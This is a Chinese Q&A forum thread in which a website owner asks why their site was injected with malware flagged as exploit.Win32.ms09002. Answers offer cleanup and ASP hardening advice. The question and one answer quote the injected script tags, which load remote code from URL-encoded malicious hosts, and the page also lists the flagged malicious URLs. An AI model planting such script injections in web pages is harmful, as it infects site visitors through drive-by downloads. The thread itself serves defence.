中易网

我的网站被挂马,原因何在?

答案:5  悬赏:0  
解决时间 2021-04-28 10:15
  • 提问者网友:逝爱
  • 2021-04-27 13:37

网站有马 还是腾讯给发现的 他告诉我们的 如下

http://www.36edu.cn/-- http://www.36edu.cn/flash/36edu_donghua.swf-- http://xlw.36edu.cn/-- http://onelun.cn-- http://xxrx.3322.org/dszq/2.htm-- http://o0o0p.cn/x2/xx.html-- http://o0o0p.cn/x2/dxxz.htm挂马名称——exploit.Win32.ms09002

网页打开 查看源码 多了一句 如下

<script src=http://%6F%6E%65%6C%75%6E%2E%63%6E></script><script src=http://%73%68%69%72%75%69%64%61%6E%2E%63%6E></script>
不知道 我的网站有什么漏洞 如何防范

最佳答案
  • 二级知识专家网友:零负荷的放任
  • 2021-04-27 14:36

您再看一下网站后台里有没有多出来什么文件,那可能是漏洞的关键!

全部回答
  • 1楼网友:而你却相形见绌
  • 2021-04-27 17:56

网站如果用的别个模板要记得升级 否则就会有漏洞

<script src=http://%6F%6E%65%6C%75%6E%2E%63%6E></script><script src=http://%73%68%69%72%75%69%64%61%6E%2E%63%6E></script>

解密出来就是这两个网站:hxxp://onelun.cn hxxp://shiruidan.cn(避免误点 用XX代替)

在源代码里面删除就OK

还要检查后台各个文件,后台一定会留下后门

建议用啊江探针扫描

记得随时备份 万一有紧急情况可还原

  • 2楼网友:懂得ㄋ、沉默
  • 2021-04-27 17:09

那可能是漏洞的关键如果是修复就行了。

  • 3楼网友:劳资的心禁止访问
  • 2021-04-27 15:39
1、用户名与口令被破解 攻击原理:用户名与口令,往往是黑客们最感兴趣的东西,如果被通过某种方式看到源代码,后果是严重的。 防范技巧:涉及用户名与口令的程序最好封装在服务器端,尽量少在ASP文件里出现,涉及与数据库连接的用户名与口令应给予最小的权限。出 现次数多的用户名与口令可以写在一个位置比较隐蔽的包含文件中。如果涉及与数据库连接,在理想状态下只给它以执行存储过程的权限,千 万不要直接给予该用户修改、插入、删除记录的权限。 2、验证被绕过 攻击原理:现在需要经过验证的ASP程序大多是在页面头部加一个判断语句,但这还不够,有可能被黑客绕过验证直接进入。 防范技巧:需要经过验证的ASP页面,可跟踪上一个页面的文件名,只有从上一页面转进来的会话才能读取这个页面。 3、inc文件泄露问题 攻击原理:当存在ASP的主页正在制作且没有进行最后调试完成以前,可以被某些搜索引擎机动追加为搜索对象。如果这时候有人利用搜索引擎 对这些网页进行查找,会得到有关文件的定位,并能在浏览器中查看到数据库地点和结构的细节,并以此揭示完整的源代码。 防范技巧:程序员应该在网页发布前对它进行彻底的调试;安全专家则需要加固ASP文件以便外部的用户不能看到它们。首先对.inc文件内容进行 加密,其次也可以使用.asp文件代替.inc文件使用户无法从浏览器直接观看文件的源代码。inc文件的文件名不要使用系统默认的或者有特殊含 义容易被用户猜测到的名称,尽量使用无规则的英文字母
  • 4楼网友:年轻没有失败
  • 2021-04-27 15:05
网站被挂马很正常 这个要防范的话也不是不可以 后台工作要做好 是防范被挂马的方式之一
我要举报
如以上回答内容为低俗、色情、不良、暴力、侵权、涉及违法等信息,可以点下面链接进行举报!
点此我要举报以上问答信息!
大家都在看
推荐信息